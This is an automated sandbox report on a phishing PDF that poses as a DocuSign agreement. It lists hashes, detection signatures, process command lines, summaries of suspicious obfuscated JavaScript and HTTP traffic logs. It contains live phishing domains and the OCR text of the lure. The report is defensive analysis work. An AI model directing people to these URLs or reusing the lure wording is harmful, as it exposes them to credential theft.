Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Final-Agreement-Document#808977735.pdf

Overview

General Information

Sample name:Final-Agreement-Document#808977735.pdf
Analysis ID:1591527
MD5:de953f16427621b9933e773dde06fcb0
SHA1:5b355334bdbd31f5713a1e25055d3ce7ee3dfa26
SHA256:4fa0de2e7fe4b62e4951643db5532eaef01522038687e6dc85771b49673183c8
Infos:

Detection

HTMLPhisher
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected HtmlPhish44
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Suspicious PDF detected (based on various text indicators)
Detected non-DNS traffic on DNS port
IP address seen in connection with other malware

Classification

  • System is w10x64
  • Acrobat.exe (PID: 7592 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Final-Agreement-Document#808977735.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 7764 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 7948 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2108 --field-trial-handle=1636,i,180817469921012578,6083720237724909725,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 8500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://aifunygg.planaltinashopping.com.br/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 8688 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,15896860205605007206,14525201702814170272,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_266JoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://qelira.qelirathor.ru/favicon.icoAvira URL Cloud: Label: phishing

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_266, type: DROPPED
    Source: PDF documentJoe Sandbox AI: Page contains button: 'REVIEW DOCUMENT' Source: 'PDF document'
    Source: PDF documentJoe Sandbox AI: PDF document contains prominent button: 'review document'
    Source: 1.7.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://qelira.qelirathor.ru/1e66qhX9/... This script demonstrates several high-risk behaviors, including detecting the presence of web automation tools, disabling common browser debugging and developer tools, and redirecting the user to a suspicious domain. The combination of these behaviors suggests a high likelihood of malicious intent, potentially targeting users for phishing or other malicious activities.
    Source: 1.6.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://qelira.qelirathor.ru/1e66qhX9/... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and URLs further increases the risk. While the script may have a legitimate purpose, the overall behavior is highly suspicious and indicative of potential malicious intent.
    Source: 1.8.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://qelira.qelirathor.ru/1e66qhX9/... This script demonstrates multiple high-risk behaviors, including dynamic code execution via the Proxy object and eval, potential data exfiltration, and obfuscated code. The combination of these factors indicates a high likelihood of malicious intent, warranting a maximum risk score of 10.
    Source: Adobe Acrobat PDFOCR Text: docusign You received a copy of the new agreement. REVIEW DOCUMENT Hi User Complete with Docusign: The attached agreement Contract#442.pdf Thank You Powered by docusign Do Not Share This Email This email contains a secure link to Docusign. Please do not share this email, link, or access code with others. Download the Docusign_App This message was sent to you using the Docusign Electronic Signature Service. If you would rather not receive email from this sender you may contact the sender with your request.
    Source: https://aifunygg.planaltinashopping.com.br/HTTP Parser: No favicon
    Source: https://qelira.qelirathor.ru/1e66qhX9/HTTP Parser: No favicon
    Source: global trafficTCP traffic: 192.168.2.4:57056 -> 1.1.1.1:53
    Source: global trafficTCP traffic: 192.168.2.4:56730 -> 1.1.1.1:53
    Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
    Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
    Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
    Source: Joe Sandbox ViewIP Address: 151.101.194.137 151.101.194.137
    Source: Joe Sandbox ViewIP Address: 151.101.194.137 151.101.194.137
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: aifunygg.planaltinashopping.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /main.js HTTP/1.1Host: aifunygg.planaltinashopping.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://aifunygg.planaltinashopping.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://aifunygg.planaltinashopping.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://aifunygg.planaltinashopping.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /main.js HTTP/1.1Host: aifunygg.planaltinashopping.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://aifunygg.planaltinashopping.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902242d8f9180f6d&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902242d8f9180f6d&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: aifunygg.planaltinashopping.com.brConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://aifunygg.planaltinashopping.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/58773639:1736903612:qJGc1e2dAaYtSb8S_Pl2oWagprYsbTE0u73qNtbBmWI/902242d8f9180f6d/aVfuuxLC46yOeh14YdFyp1RNJvO.5evD5Dx3tNm6VWg-1736906310-1.1.1.1-gHdCWsDgrEoUEe038cbis_E3mVHefnMgQL5Deg5vkmDY7fx6fF4wbzi0lfy3_HDa HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/902242d8f9180f6d/1736906312223/ImUa0poB2nYJac9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/902242d8f9180f6d/1736906312223/ImUa0poB2nYJac9 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/902242d8f9180f6d/1736906312225/814d7182a35543fc036a8dc4b75eac522e4260df14e17dc604468f7fd5a74ad5/telJsXeRiKVnWIp HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/58773639:1736903612:qJGc1e2dAaYtSb8S_Pl2oWagprYsbTE0u73qNtbBmWI/902242d8f9180f6d/aVfuuxLC46yOeh14YdFyp1RNJvO.5evD5Dx3tNm6VWg-1736906310-1.1.1.1-gHdCWsDgrEoUEe038cbis_E3mVHefnMgQL5Deg5vkmDY7fx6fF4wbzi0lfy3_HDa HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://aifunygg.planaltinashopping.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902245eceb0e5e66&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902245eceb0e5e66&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1761043156:1736903627:FepZ0G07M88okGs1roo1whFJjHlwkPb89wlAxNZ6XgE/902245eceb0e5e66/uhSqwIH2Glfhaq6zDtDSmuFXwPhDZ_I3zx70kKifwPg-1736906436-1.1.1.1-l2LrSWA6w7yqxXJj.BQudrtGYyrIxG9yjvullH9o2MeRea8FmWICQyeWv_ac.kLo HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/902245eceb0e5e66/1736906438391/wFJt-uWa1ESZ5iy HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/902245eceb0e5e66/1736906438391/wFJt-uWa1ESZ5iy HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/902245eceb0e5e66/1736906438394/91c3e010fc3651bc618f68ca8ef2d8741d9fcaea910fdc6d25f890264a37241c/c5TG4frDM7SGrCI HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/uz3u1/0x4AAAAAAA5OKIzF1t1zkHd6/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1761043156:1736903627:FepZ0G07M88okGs1roo1whFJjHlwkPb89wlAxNZ6XgE/902245eceb0e5e66/uhSqwIH2Glfhaq6zDtDSmuFXwPhDZ_I3zx70kKifwPg-1736906436-1.1.1.1-l2LrSWA6w7yqxXJj.BQudrtGYyrIxG9yjvullH9o2MeRea8FmWICQyeWv_ac.kLo HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1761043156:1736903627:FepZ0G07M88okGs1roo1whFJjHlwkPb89wlAxNZ6XgE/902245eceb0e5e66/uhSqwIH2Glfhaq6zDtDSmuFXwPhDZ_I3zx70kKifwPg-1736906436-1.1.1.1-l2LrSWA6w7yqxXJj.BQudrtGYyrIxG9yjvullH9o2MeRea8FmWICQyeWv_ac.kLo HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /1e66qhX9/ HTTP/1.1Host: qelira.qelirathor.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://aifunygg.planaltinashopping.com.br/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://qelira.qelirathor.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
